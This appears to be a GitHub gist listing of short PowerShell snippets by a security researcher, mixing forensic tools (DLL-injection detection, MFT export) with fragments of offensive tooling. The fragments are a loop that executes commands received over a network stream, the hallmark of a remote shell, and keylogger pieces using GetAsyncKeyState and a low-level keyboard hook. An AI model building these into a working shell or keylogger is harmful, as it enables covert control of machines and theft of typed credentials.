Skip to content

Instantly share code, notes, and snippets.

View secabstraction's full-sized avatar

Jesse secabstraction

152 followers · 8 following
View GitHub Profile
@secabstraction
secabstraction / Get-DosDevice.ps1
Created September 26, 2015 17:56
A powershell wrapper around QueryDosDevice
function Get-DosDevice {
[CmdletBinding()]
Param (
[Parameter()]
[ValidateNotNullOrEmpty()]
[String]$Name
)
#region WinAPI
@secabstraction
secabstraction / Get-ProcessTrace.ps1
Last active September 27, 2015 04:06
Trace the threads of a process, "mini-dbg" RDI detection
function Get-ProcessTrace {
<#
.SYNOPSIS
Walks thread stacks of specified process(es) to help identify dll injection.
.DESCRIPTION
This commandlet uses Windows Remote Management to trace the threads of specified process(es) of remote machines.
.PARAMETER ComputerName
Specify the hostname or IP address of a remote computer to retrieve data from.
@secabstraction
secabstraction / Export-MFT.ps1
Last active July 22, 2024 09:45
function Export-MFT {
<#
.SYNOPSIS
Extracts master file table from volume.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.DESCRIPTION
@secabstraction
secabstraction / Invoke-WmiRunspaceQuery.ps1
Last active September 28, 2015 12:37
Runspace jobbing of Get-WmiObject
function Invoke-WmiRunspaceQuery {
<#
.SYNOPSIS
Creates a multi-threaded effect by using runspaces to speed up WMI queries to multiple hosts.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.PARAMETER ComputerName
@secabstraction
secabstraction / StdOutRemedy.ps1
Last active January 14, 2016 19:19
try { $ScriptBlock = [ScriptBlock]::Create($EncodingType.GetString($ReceivedBytes)) }
catch { break } # network stream closed
$Global:Error.Clear()
$BytesToSend += $EncodingType.GetBytes(($ScriptBlock.Invoke() | Out-String))
foreach ($Err in $Global:Error) { $BytesToSend += $EncodingType.GetBytes($Err.Exception.Message) }
$BytesToSend += $EncodingType.GetBytes(("`nPS $((Get-Location).Path)> "))
@secabstraction
secabstraction / StdOutProblem.ps1
Created January 14, 2016 19:13
function Setup_CMD
{
param($FuncSetupVars)
if($global:Verbose){$Verbose = $True}
$FuncVars = @{}
$ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessStartInfo.FileName = $FuncSetupVars[0]
$ProcessStartInfo.UseShellExecute = $False
$ProcessStartInfo.RedirectStandardInput = $True
$ProcessStartInfo.RedirectStandardOutput = $True
@secabstraction
secabstraction / RunawayLoop.ps1
Last active January 14, 2016 19:56
while ($true) { continue }
# With nothing to do this quickly eats 100% CPU
@secabstraction
secabstraction / ThrottledLoop.ps1
Last active January 15, 2016 16:43
while ($true) { Start-Sleep -Milliseconds 10 ; continue }
# This minute pause is imperceptible to a user, but drops the CPU to 0%
@secabstraction
secabstraction / InitializationRoutine.ps1
Last active January 19, 2016 16:22
$Initilizer = {
function KeyLog {
# Win32 Imports
Start-Sleep -Milliseconds $PollingInterval
# Excessive GetAsyncKeyState loop to check for pressed keys
}
}
Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null
@secabstraction
secabstraction / HookMessageLoop.ps1
Last active January 19, 2016 16:39
# Set WM_KEYBOARD_LL hook
$Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0)
$Stopwatch = [Diagnostics.Stopwatch]::StartNew()
# Message loop
while ($true) {
if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break }
$PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0)
Start-Sleep -Milliseconds 10